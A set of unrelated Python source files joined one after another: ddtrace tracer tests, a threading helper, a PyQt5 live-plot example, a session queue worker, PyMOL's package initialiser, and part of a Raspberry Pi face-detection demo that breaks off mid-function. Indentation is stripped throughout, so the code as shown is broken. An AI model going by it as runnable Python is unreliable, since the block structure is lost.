def test_debug_mode():
p = subprocess.Popen(
[sys.executable, "-c", "import ddtrace"],
env=dict(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
assert p.stdout.read() == b""
assert b"DEBUG:ddtrace" not in p.stderr.read()
p = subprocess.Popen(
[sys.executable, "-c", "import ddtrace"],
env=dict(DD_TRACE_DEBUG="true"),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
assert p.stdout.read() == b""
# Stderr should have some debug lines
assert b"DEBUG:ddtrace" in p.stderr.read()
def test_output(tmpdir):
f = tmpdir.join("test.py")
f.write(
"""
import ddtrace
""".lstrip()
)
p = subprocess.Popen(
["ddtrace-run", sys.executable, "test.py"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=str(tmpdir),
)
p.wait()
assert p.stderr.read() == six.b("")
assert p.stdout.read() == six.b("")
assert p.returncode == 0
def test_start_in_thread(tmpdir):
f = tmpdir.join("test.py")
f.write(
"""
import threading
def target():
import ddtrace
t = threading.Thread(target=target)
t.start()
t.join()
""".lstrip()
)
p = subprocess.Popen(
["ddtrace-run", sys.executable, "test.py"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=str(tmpdir),
)
p.wait()
assert p.stderr.read() == six.b("")
assert p.stdout.read() == six.b("")
assert p.returncode == 0
@pytest.mark.skipif(AGENT_VERSION != "latest", reason="Agent v5 doesn't support UDS")
def test_single_trace_uds():
t = Tracer()
sockdir = "/tmp/ddagent/trace.sock"
t.configure(uds_path=sockdir)
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("client.testing").finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_uds_wrong_socket_path():
t = Tracer()
t.configure(uds_path="/tmp/ddagent/nosockethere")
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("client.testing").finish()
t.shutdown()
calls = [
mock.call("failed to send traces to Datadog Agent at %s", "unix:///tmp/ddagent/nosockethere", exc_info=True)
]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="FIXME: Test agent doesn't support this for some reason.")
def test_payload_too_large():
t = Tracer()
# Make sure a flush doesn't happen partway through.
t.configure(writer=AgentWriter(processing_interval=1000))
with mock.patch("ddtrace.internal.writer.log") as log:
for i in range(100000):
with t.trace("operation") as s:
s.set_tag(str(i), "b" * 190)
s.set_tag(str(i), "a" * 190)
t.shutdown()
calls = [
mock.call(
"trace buffer (%s traces %db/%db) cannot fit trace of size %db, dropping",
AnyInt(),
AnyInt(),
AnyInt(),
AnyInt(),
)
]
log.warning.assert_has_calls(calls)
log.error.assert_not_called()
def test_large_payload():
t = Tracer()
# Traces are approx. 275 bytes.
# 10,000*275 ~ 3MB
with mock.patch("ddtrace.internal.writer.log") as log:
for i in range(10000):
with t.trace("operation"):
pass
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_child_spans():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
spans = []
for i in range(10000):
spans.append(t.trace("op"))
for s in spans:
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_metrics():
with override_global_config(dict(health_metrics_enabled=True)):
t = Tracer()
statsd_mock = mock.Mock()
t.writer.dogstatsd = statsd_mock
assert t.writer._report_metrics
with mock.patch("ddtrace.internal.writer.log") as log:
for _ in range(5):
spans = []
for i in range(3000):
spans.append(t.trace("op"))
for s in spans:
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
statsd_mock.increment.assert_has_calls(
[
mock.call("datadog.tracer.http.requests"),
]
)
statsd_mock.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 5, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 15000, tags=[]),
mock.call("datadog.tracer.http.requests", 1, tags=[]),
mock.call("datadog.tracer.http.sent.bytes", AnyInt()),
],
any_order=True,
)
def test_single_trace_too_large():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
with t.trace("huge"):
for i in range(100000):
with tracer.trace("operation") as s:
s.set_tag("a" * 10, "b" * 10)
t.shutdown()
calls = [mock.call("trace (%db) larger than payload limit (%db), dropping", AnyInt(), AnyInt())]
log.warning.assert_has_calls(calls)
log.error.assert_not_called()
def test_trace_bad_url():
t = Tracer()
t.configure(hostname="bad", port=1111)
with mock.patch("ddtrace.internal.writer.log") as log:
with t.trace("op"):
pass
t.shutdown()
calls = [mock.call("failed to send traces to Datadog Agent at %s", "http://bad:1111", exc_info=True)]
log.error.assert_has_calls(calls)
def test_writer_headers():
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
with t.trace("op"):
pass
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("Datadog-Meta-Tracer-Version") == ddtrace.__version__
assert headers.get("Datadog-Meta-Lang") == "python"
assert headers.get("Content-Type") == "application/msgpack"
assert headers.get("X-Datadog-Trace-Count") == "1"
if container.get_container_info():
assert "Datadog-Container-Id" in headers
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
for _ in range(100):
with t.trace("op"):
pass
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("X-Datadog-Trace-Count") == "100"
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
for _ in range(10):
with t.trace("op"):
for _ in range(5):
t.trace("child").finish()
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("X-Datadog-Trace-Count") == "10"
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support priority sampling responses.")
def test_priority_sampling_response():
# Send the data once because the agent doesn't respond with them on the
# first payload.
t = Tracer()
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
assert "service:my-svc,env:my-env" not in t.writer._priority_sampler._by_service_samplers
t.shutdown()
# For some reason the agent doesn't start returning the service information
# immediately
import time
time.sleep(5)
t = Tracer()
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
assert "service:my-svc,env:my-env" not in t.writer._priority_sampler._by_service_samplers
t.shutdown()
assert "service:my-svc,env:my-env" in t.writer._priority_sampler._by_service_samplers
def test_bad_endpoint():
t = Tracer()
t.writer._endpoint = "/bad"
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
t.shutdown()
calls = [mock.call("unsupported endpoint '%s': received response %s from Datadog Agent", "/bad", 404)]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="FIXME: Test agent response is different.")
def test_bad_payload():
t = Tracer()
class BadEncoder:
def encode_trace(self, spans):
return []
def join_encoded(self, traces):
return "not msgpack"
t.writer._encoder = BadEncoder()
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("asdf").finish()
t.shutdown()
calls = [
mock.call(
"failed to send traces to Datadog Agent at %s: HTTP error status %s, reason %s",
"http://localhost:8126",
400,
"Bad Request",
)
]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support v0.3")
def test_downgrade():
t = Tracer()
t.writer._downgrade(None, None)
assert t.writer._endpoint == "/v0.3/traces"
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_span_tags():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.set_metric("number", 123)
s.set_metric("number", 12.0)
s.set_metric("number", "1")
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
@pytest.mark.skipif(AGENT_VERSION != "testagent", reason="Tests only compatible with a testagent")
class TestTraces(TracerTestCase):
"""
These snapshot tests ensure that trace payloads are being sent as expected.
"""
@snapshot(include_tracer=True)
def test_single_trace_single_span(self, tracer):
s = tracer.trace("operation", service="my-svc")
s.set_tag("k", "v")
# numeric tag
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
s.finish()
tracer.shutdown()
@snapshot(include_tracer=True)
def test_multiple_traces(self, tracer):
with tracer.trace("operation1", service="my-svc") as s:
s.set_tag("k", "v")
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
tracer.trace("child").finish()
with tracer.trace("operation2", service="my-svc") as s:
s.set_tag("k", "v")
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
tracer.trace("child").finish()
tracer.shutdown()
@snapshot(include_tracer=True)
def test_filters(self, tracer):
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
tracer.shutdown()
|
ParaphraseThreadState.py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 8 14:29:56 2016
@author: neerbek
"""
from threading import Thread
from threading import Lock
import queue
import time
NO_BLOCK = False
class ParaphraseThreadState:
def __init__(self):
self.threads = {}
self.threads_done = queue.Queue()
self.work = queue.Queue()
self.completed_work = queue.Queue()
self.failed_work = queue.Queue()
def add_thread(self, tname, thread): #to be called from main before threads starting
self.threads[tname] = thread
def start_threads(self):
for t in self.threads.values():
t.start()
def thread_done(self, thread_name):
self.threads_done.put(thread_name)
def is_all_threads_done(self):
return self.threads_done.qsize()==len(self.threads)
def put_work(self, w):
return self.work.put(w) # may block
def get_work(self):
return self.work.get(NO_BLOCK) # may throw Queue.Empty
def remaining_work(self):
return self.work.qsize()
def has_more_work(self):
return not self.work.empty()
def work_done(self, w):
self.completed_work.put(w)
def work_failed(self, w):
self.failed_work.put(w)
class ThreadContainer:
def __init__(self, name, state, myparent):
self.name = name
self.state = state
self.t = None
self.mutex = Lock()
self.stop_signal = False
self.the_log = []
self.current_work = None
self.myparent = myparent
def log(self, msg):
with self.mutex:
self.the_log.append(msg)
def get_log(self):
res = []
with self.mutex:
res.extend(self.the_log)
return res
def do_stop(self):
with self.mutex:
self.stop_signal = True
def is_stop(self):
with self.mutex:
return self.stop_signal
def loop_work(self, work): #may be extended by subclasses
self.myparent.run(work)
def get_work(self): #may be extended by subclasses
return self.state.get_work()
def run_internal(self):
work = None
while True: #loop until state.work_queue is empty and signal_stop is called
try:
work = self.myparent.get_work()
except queue.Empty:
if self.is_stop():
print(self.name + " is stopping")
break
time.sleep(1)
continue
self.current_work = work
error_msg = None
try:
self.loop_work(work)
except Exception as e:
error_msg = "Exception in " + self.name + " {}".format(e)
except:
error_msg = "General error in " + self.name
if error_msg is None:
self.state.work_done(self.current_work)
else:
self.state.work_failed(self.current_work)
print(error_msg)
self.log(error_msg)
self.current_work = None
self.state.thread_done(self)
#static
def run_static(this):
this.run_internal()
def start(self):
self.t = Thread(target=self.run_internal, args=() )
self.t.start()
|
main_example.py
|
import signal
from threading import Thread
from PyQt5.QtWidgets import QMainWindow
import pglive.examples_pyqt5 as examples
from pglive.examples_pyqt5.designer_example.win_template import Ui_MainWindow
from pglive.sources.data_connector import DataConnector
from pglive.sources.live_plot import LiveLinePlot
class MainWindow(QMainWindow, Ui_MainWindow):
"""Create main window from template"""
def __init__(self, parent=None):
super().__init__(parent)
self.setupUi(self)
win = MainWindow()
plot = LiveLinePlot()
data_connector = DataConnector(plot, max_points=600)
win.plot_widget.addItem(plot)
Thread(target=examples.sin_wave_generator, args=(data_connector,)).start()
signal.signal(signal.SIGINT, lambda sig, frame: examples.stop())
win.show()
examples.app.exec()
examples.stop()
|
queue.py
|
# coding: utf-8
from copy import copy
from .utils import TargetRepeatingThread
from .node import nodes
from .log import get_logger
log = get_logger(__name__)
class SessionQueue(list):
def enqueue(self, dc):
delayed_session = DelayedSession(dc)
self.append(delayed_session)
return delayed_session
class DelayedSession(object):
def __init__(self, dc):
self.dc = dc
self.node = None
def to_json(self):
return self.dc
class SessionQueueWorker(object):
def __init__(self, queue=None):
if queue is None:
queue = SessionQueue()
self.queue = queue
self.worker = TargetRepeatingThread(target=self.work)
self.worker.start()
def stop(self):
self.worker.stop()
self.worker.join()
log.info("Session Queue Worker stopped")
def work(self):
for session in copy(self.queue):
node = nodes.get_node_by_dc(session.dc)
if node:
session.node = node
self.queue.remove(session)
|
__init__.py
|
'''
PyMOL Molecular Graphics System
Copyright (c) Schrodinger, Inc.
Supported ways to launch PyMOL:
If $PYMOL_PATH is a non-default location, it must be set and exported
before launching PyMOL.
From a terminal:
shell> python /path/to/pymol/__init__.py [args]
From a python main thread:
>>> # with GUI
>>> import pymol
>>> pymol.finish_launching()
>>> # without GUI
>>> import pymol
>>> pymol.finish_launching(['pymol', '-cq'])
'''
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import __main__
if __name__ == '__main__':
# PyMOL launched as "python pymol/__init__.py"
# or via execfile(".../pymol/__init__.py",...) from main
# or as "python -m pymol.__init__"
if 'pymol' not in sys.modules:
# "python /abc/pymol/__init__.py" will add /abc/pymol to PYTHONPATH
# (we don't want that), but not /abc and not the current directory (we
# want those)
pymol_base = os.path.dirname(os.path.realpath(__file__))
site_packages = os.path.dirname(pymol_base)
# remove /abc/pymol
if pymol_base in sys.path:
sys.path.remove(pymol_base)
# add /abc
if site_packages not in sys.path:
sys.path.insert(0, site_packages)
# add current directory
if '' not in sys.path:
sys.path.insert(0, '')
# arguments default to sys.argv... but also support execfile(...)
# from a terminal where the user could set pymol_argv
args = getattr(__main__, "pymol_argv", None)
# standard launch (consume main thread)
import pymol
pymol.launch(args)
# this should never be reached because PyMOL will exit the process
raise SystemExit
IS_PY2 = sys.version_info[0] == 2
IS_PY3 = sys.version_info[0] == 3
IS_WINDOWS = sys.platform.startswith('win')
IS_MACOS = sys.platform.startswith('darwin')
IS_LINUX = sys.platform.startswith('linux')
if IS_PY3:
import _thread as thread
else:
import thread
import copy
import threading
import re
import time
import traceback
import math
from . import invocation
def _init_internals(_pymol):
# Create a temporary object "stored" in the PyMOL global namespace
# for usage with evaluate based-commands such as alter
_pymol.stored = Scratch_Storage()
# Create a permanent object in the PyMOL global namespace
# that will be picked and unpickled along with the session
_pymol.session = Session_Storage()
# This global will be non-None if logging is active
# (global variable used for efficiency)
_pymol._log_file = None
# This global will be non-None if an external gui
# exists. It mainly exists so that events which occur
# in the Python thread can be handed off to the
# external GUI thread through one or more FIFO Queues
# (global variable used for efficiency)
_pymol._ext_gui = None
# lists of functions to call when saving and restoring pymol session objects
# The entry 'None' represents the PyMOL C-API function call
_pymol._session_save_tasks = [ None ]
_pymol._session_restore_tasks = [ None ]
# cached results (as a list):
# [ [size, (hash1, hash2, ... ), (inp1, inp2, ...), output],
# [size, (hash1, hash2, ... ), (inp1, inp2, ...), output],
# ... ]
_pymol._cache = []
# standard input reading thread
_pymol._stdin_reader_thread = None
# stored views
_pymol._view_dict = {}
_pymol._view_dict_sc = None
# stored scenes
_pymol._scene_dict_sc = None
_pymol._scene_counter = 1
_pymol._scene_quit_on_action = ''
# get us a private invocation pseudo-module
_pymol._invocation = Scratch_Storage()
_pymol._invocation.options = copy.deepcopy(invocation.options)
_pymol._invocation.get_user_config = invocation.get_user_config
_pymol._invocation.parse_args = invocation.parse_args
# these locks are to be shared by all PyMOL instances within a
# single Python interpeter
_pymol.lock_api = threading.RLock() # mutex for API calls from the outside
_pymol.lock_api_status = threading.RLock() # mutex for PyMOL status info
_pymol.lock_api_glut = threading.RLock() # mutex for GLUT avoidance
_pymol.lock_api_data = threading.RLock() # mutex for internal data structures
def get_version_message(v=None):
'''
Get an informative product + version string
'''
if not v:
v = _cmd.get_version()
p = "PyMOL %s " % v[0]
p += "Incentive Product" if invocation.options.incentive_product else \
"Open-Source"
if v[4]:
p += ' (' + v[4][:10] + ')'
if v[3]:
p += ', ' + time.strftime('%Y-%m-%d', time.localtime(v[3]))
return p
def guess_pymol_path():
'''
Guess PYMOL_PATH from typical locations and return it as string.
'''
init_file = os.path.abspath(__file__)
pymol_path_candidates = [
# $PYMOL_PATH == <site-packages>/pymol/pymol_path
os.path.join(os.path.dirname(init_file), 'pymol_path'),
# $PYMOL_PATH/modules/pymol/__init__.py
re.sub(r"[\/\\]modules[\/\\]pymol[\/\\]__init__\.py[c]*$", "", init_file),
# /usr/share/pymol
os.path.join(sys.prefix, 'share', 'pymol'),
]
for pymol_path in pymol_path_candidates:
if os.path.isdir(pymol_path):
return pymol_path
return '.'
def setup_environ():
# guess PYMOL_PATH if unset
if 'PYMOL_PATH' not in os.environ:
os.environ['PYMOL_PATH'] = guess_pymol_path()
# other PyMOL variables
if 'PYMOL_DATA' not in os.environ:
os.environ['PYMOL_DATA'] = os.path.join(os.environ['PYMOL_PATH'], 'data')
if 'PYMOL_SCRIPTS' not in os.environ:
os.environ['PYMOL_SCRIPTS'] = os.path.join(os.environ['PYMOL_PATH'], 'scripts')
os.environ['TUT'] = os.path.join(os.environ['PYMOL_DATA'], 'tut')
# auto-detect bundled FREEMOL (if present)
if 'FREEMOL' not in os.environ:
for test_path in ['ext', 'freemol']:
test_path = os.path.join(os.environ['PYMOL_PATH'], test_path)
if os.path.isdir(test_path):
os.environ['FREEMOL'] = test_path
break
# include FREEMOL's libpy in sys.path (if present)
if 'FREEMOL' in os.environ:
freemol_libpy = os.path.join(os.environ['FREEMOL'], "libpy")
if os.path.isdir(freemol_libpy) and freemol_libpy not in sys.path:
sys.path.append(freemol_libpy)
# set Tcl/Tk environment if we ship it in ext/lib
pymol_path = os.environ['PYMOL_PATH']
for varname, dirname in [
('TCL_LIBRARY', 'tcl8.5'),
('TK_LIBRARY', 'tk8.5')]:
dirname = os.path.join(pymol_path, "ext", "lib", dirname)
if os.path.isdir(dirname):
os.environ[varname] = dirname
def exec_str(self, string):
'''
Execute string in "self" namespace (used from C)
'''
try:
exec(string, self.__dict__, self.__dict__)
except Exception:
traceback.print_exc()
return None
def exec_deferred(self):
'''
Execute the stuff from invocations.options.deferred
'''
try:
from socket import error as socket_error
except ImportError:
socket_error = None
print('import socket failed')
cmd = self.cmd
_pymol = cmd._pymol
# read from stdin (-p)
if self.invocation.options.read_stdin and not _pymol._stdin_reader_thread:
try:
t = _pymol._stdin_reader_thread = \
threading.Thread(target=cmd._parser.stdin_reader)
t.setDaemon(1)
t.start()
except:
traceback.print_exc()
# do the deferred stuff
try:
if cmd.ready():
cmd.config_mouse(quiet=1)
for a in self.invocation.options.deferred:
if a[0:4] == "_do_":
cmd.do(a[4:])
else:
cmd.load(a, quiet=0)
except CmdException as e:
print(e)
print(" Error: Argument processing aborted due to exception (above).")
except socket_error:
# this (should) only happen if we're opening a PWG file on startup
# and the port is busy. For now, simply bail...
cmd.wizard("message",["Socket.error: ","",
"\\999Assigned socket in use.","",
"\\779Is PyMOL already launched?","",
"\\966Shutting down..."])
cmd.refresh()
cmd.do("time.sleep(2);cmd.quit()")
def adapt_to_hardware(self):
'''
optimize for (or workaround) specific hardware
'''
cmd = self.cmd
vendor, renderer, version = cmd.get_renderer()
# Quadro cards don't support GL_BACK in stereo contexts
if vendor.startswith('NVIDIA'):
if 'Quadro' in renderer:
if invocation.options.show_splash:
print(" Adapting to Quadro hardware.")
cmd.set('stereo_double_pump_mono', 1)
elif vendor.startswith('Mesa'):
if renderer[0:18]=='Mesa GLX Indirect':
pass
elif vendor.startswith('ATI'):
if renderer[0:17] == 'FireGL2 / FireGL3': # obsolete ?
if invocation.options.show_splash:
print(" Adapting to FireGL hardware.")
cmd.set('line_width', 2, quiet=1)
if IS_WINDOWS:
if sys.getwindowsversion()[0] > 5:
# prevent color corruption by calling glFlush etc.
cmd.set('ati_bugs', 1)
if 'Radeon HD' in renderer:
if invocation.options.show_splash:
print(" Adjusting settings to improve performance for ATI cards.")
if cmd.get_setting_int("use_shaders")==0:
# limit frame rate to 30 fps to avoid ATI "jello"
# where screen updates fall way behind the user.
cmd.set("max_ups", 30)
elif vendor.startswith('Microsoft'):
if renderer[0:17] == 'GDI Generic':
cmd.set('light_count', 1)
cmd.set('spec_direct', 0.7)
elif vendor.startswith("Intel"):
if "Express" in renderer:
if invocation.options.show_splash:
print(" Disabling shaders for Intel Express graphics")
cmd.set("use_shaders", 0)
elif (' R300 ' in vendor # V: X.Org R300 Project, R: Gallium 0.4 on ATI RV370
):
if invocation.options.show_splash:
print(" Detected blacklisted graphics driver. Disabling shaders.")
cmd.set("use_shaders", 0)
# find out how many processors we have, and adjust hash
# table size to reflect available RAM
try:
import multiprocessing
ncpu = multiprocessing.cpu_count()
if ncpu > 1:
cmd.set("max_threads", ncpu)
if invocation.options.show_splash:
print(" Detected %d CPU cores."%ncpu, end=' ')
print(" Enabled multithreaded rendering.")
except:
pass
# store our adapted state as default
cmd.reinitialize("store")
def launch_gui(self):
'''
Launch if requested:
- external GUI
'''
pymol_path = os.getenv('PYMOL_PATH', '')
try:
poll = IS_MACOS
if self.invocation.options.external_gui == 3:
if 'DISPLAY' not in os.environ:
os.environ['DISPLAY'] = ':0.0'
if self.invocation.options.external_gui in (1, 3):
__import__(self.invocation.options.gui)
sys.modules[self.invocation.options.gui].__init__(self, poll,
skin = self.invocation.options.skin)
# import plugin system
import pymol.plugins
except:
traceback.print_exc()
def prime_pymol():
'''
Set the current thread as the glutThread
'''
global glutThread
if not glutThread:
glutThread = thread.get_ident()
def _launch_no_gui():
import pymol2
p = pymol2.SingletonPyMOL()
p.start()
# TODO sufficient?
while (p.idle() or p.getRedisplay() or
invocation.options.keep_thread_alive or
cmd.get_modal_draw() or
cmd.get_setting_int('keep_alive') or
cmd._pymol._stdin_reader_thread is not None):
p.draw()
# TODO needed?
cmd.sync()
p.stop()
def launch(args=None, block_input_hook=0):
'''
Run PyMOL with args
Only returns if we are running pretend GLUT.
'''
if args is None:
args = sys.argv
invocation.parse_args(args)
if invocation.options.gui == 'pmg_qt':
if invocation.options.no_gui:
return _launch_no_gui()
elif invocation.options.testing:
return pymol._cmd.test2()
try:
from pmg_qt import pymol_qt_gui
sys.exit(pymol_qt_gui.execapp())
except ImportError:
print('Qt not available, using GLUT/Tk interface')
invocation.options.gui = 'pmg_tk'
prime_pymol()
_cmd.runpymol(_cmd._get_global_C_object(), block_input_hook)
def finish_launching(args=None):
'''
Start the PyMOL process in a thread
'''
global glutThreadObject
if cmd._COb is not None:
return
import pymol
# legacy
if args is None:
args = getattr(pymol, 'pymol_argv', None)
if args is None:
args = getattr(__main__, 'pymol_argv', sys.argv)
if True:
# run PyMOL in thread
invocation.options.keep_thread_alive = 1
cmd.reaper = threading.current_thread()
glutThreadObject = threading.Thread(target=launch,
args=(list(args), 1))
glutThreadObject.start()
e = threading.Event()
# wait for the C library to initialize
while cmd._COb is None:
e.wait(0.01)
# make sure symmetry module has time to start...
while not hasattr(pymol, 'xray'):
e.wait(0.01)
class CmdException(Exception):
'''
Exception type for PyMOL commands
'''
label = "Error"
def __init__(self, message='', label=None):
self.message = message
if message:
self.args = (message,)
if label:
self.label = label
def __str__(self):
return " %s: %s" % (self.label, self.message)
class IncentiveOnlyException(CmdException):
'''
Exception type for features that are not available in Open-Source PyMOL
'''
label = "Incentive-Only-Error"
def __init__(self, message=''):
if not message:
try:
funcname = sys._getframe(1).f_code.co_name
message = '"%s" is not available in Open-Source PyMOL' % (funcname,)
except:
message = 'Not available in Open-Source PyMOL'
message += '\n\n' \
' Please visit http://pymol.org if you are interested in the\n' \
' full featured "Incentive PyMOL" version.\n'
super(IncentiveOnlyException, self).__init__(message)
class Scratch_Storage:
'''
Generic namespace
'''
def __reduce__(self):
# for loading Python 3 (new-style class) pickle with Python 2
return (self.__class__, (), self.__dict__)
def get_unused_name(self, prefix='tmp'):
'''
Get an unused name from this namespace
'''
i = 1
while True:
name = prefix + str(i)
if not hasattr(self, name):
setattr(self, name, None)
return name
i += 1
class Session_Storage:
'''
Generic namespace
'''
def __reduce__(self):
# for loading Python 3 (new-style class) pickle with Python 2
return (self.__class__, (), self.__dict__)
def _colortype(cmd):
# backwards compatible color index type for iterate, which used
# to expose colors as RGB tuples
get_color_tuple = cmd.get_color_tuple
class Color(int):
def __getitem__(self, i):
return get_color_tuple(self)[i]
def __len__(self):
return 3
return Color
######### VARIABLES ############################
glutThread = None
######### ENVIRONMENT ##########################
setup_environ()
# initialize instance-specific module/object internals
_init_internals(sys.modules[__name__])
# get X-window support (machine_get_clipboard)
if 'DISPLAY' in os.environ:
from .xwin import *
########## C MODULE ############################
import pymol._cmd
_cmd = sys.modules['pymol._cmd']
from . import cmd
cmd._COb = None
try:
import epymol
except ImportError:
pass
########## WORKAROUND TO PREVENT "import cmd" ##############################
# Previous versions of PyMOL did relative imports and thus allowd
# "import cmd" in pymol scripts to import the pymol.cmd module. To be more
# strict and for compatibility with python3 we use absolute imports now,
# which unfortunately will import an unrelated "cmd" module from the default
# python library, and even worse will corrupt the pymol namespace with it.
# The following causes an import error for "import cmd":
class _NoCmdFinder:
def find_spec(self, fullname, path=None, target=None):
if path is None and fullname == 'cmd':
msg = 'use "from pymol import cmd" instead of "import cmd"'
print('Warning: {}'.format(msg))
return None
find_module = find_spec
sys.meta_path.insert(0, _NoCmdFinder())
########## LEGACY PRINT STATEMENT FOR PYMOL COMMAND LINE ###################
if IS_PY3:
def _print_statement(*args, **_):
'''Legacy Python-2-like print statement for the PyMOL command line'''
kw = {}
if args and args[0].startswith('>>'):
kw['file'] = eval(args[0][2:])
args = args[1:]
if args and not args[-1]:
kw['end'] = ' '
args = args[:-1]
args = [eval(a) for a in args]
print(*args, **kw)
cmd.extend('print', _print_statement)
|
demo_gray_single_scale.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import _init_paths
import caffe
import cv2
import numpy as np
from python_wrapper import *
import os
from timeit import default_timer as timer
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import imutils
from imutils.video import FPS
class PiVideoStream:
def __init__(self,resolution=(352,240),framerate=32):
#initialize the camera and the stream
self.camera = PiCamera()
self.camera.resolution =resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port = True)
#initialize the frame and teh variable used to indicate if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
#start the thread to read frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
#keep looping infinitely until the thread is stopped
for f in self.stream:
#grab the fram from the stream and clear the stream in preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
#if the thread indicator variable is set, stop the thread and camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
#return the frame most recently read
return self.frame
def stop(self):
#indicate that the thread should be stopped
self.stopped = True
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bouding boxes
if reg.shape[1] == 1:
print("reshape of reg")
pass # reshape of reg
w = boundingbox[:,2] - boundingbox[:,0] + 1
h = boundingbox[:,3] - boundingbox[:,1] + 1
bb0 = boundingbox[:,0] + reg[:,0]*w
bb1 = boundingbox[:,1] + reg[:,1]*h
bb2 = boundingbox[:,2] + reg[:,2]*w
bb3 = boundingbox[:,3] + reg[:,3]*h
boundingbox[:,0:4] = np.array([bb0, bb1, bb2, bb3]).T
#print "bb", boundingbox
return boundingbox
def pad(boxesA, w, h):
boxes = boxesA.copy() # shit, value parameter!!!
#print '#################'
#print 'boxes', boxes
#print 'w,h', w, h
tmph = boxes[:,3] - boxes[:,1] + 1
tmpw = boxes[:,2] - boxes[:,0] + 1
numbox = boxes.shape[0]
#print 'tmph', tmph
#print 'tmpw', tmpw
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:,0:1][:,0]
y = boxes[:,1:2][:,0]
ex = boxes[:,2:3][:,0]
ey = boxes[:,3:4][:,0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w-1 + tmpw[tmp]
ex[tmp] = w-1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h-1 + tmph[tmp]
ey[tmp] = h-1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy = np.maximum(0, dy-1)
dx = np.maximum(0, dx-1)
y = np.maximum(0, y-1)
x = np.maximum(0, x-1)
edy = np.maximum(0, edy-1)
edx = np.maximum(0, edx-1)
ey = np.maximum(0, ey-1)
ex = np.maximum(0, ex-1)
#print "dy" ,dy
#print "dx" ,dx
#print "y " ,y
#print "x " ,x
#print "edy" ,edy
#print "edx" ,edx
#print "ey" ,ey
#print "ex" ,ex
#print 'boxes', boxes
return [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph]
def rerec(bboxA):
# convert bboxA to square
w = bboxA[:,2] - bboxA[:,0]
h = bboxA[:,3] - bboxA[:,1]
l = np.maximum(w,h).T
#print 'bboxA', bboxA
#print 'w', w
#print 'h', h
#print 'l', l
bboxA[:,0] = bboxA[:,0] + w*0.5 - l*0.5
bboxA[:,1] = bboxA[:,1] + h*0.5 - l*0.5
bboxA[:,2:4] = bboxA[:,0:2] + np.repeat([l], 2, axis = 0).T
return bboxA
def nms(boxes, threshold, type):
"""nms
:boxes: [:,0:5]
:threshold: 0.5 like
:type: 'Min' or others
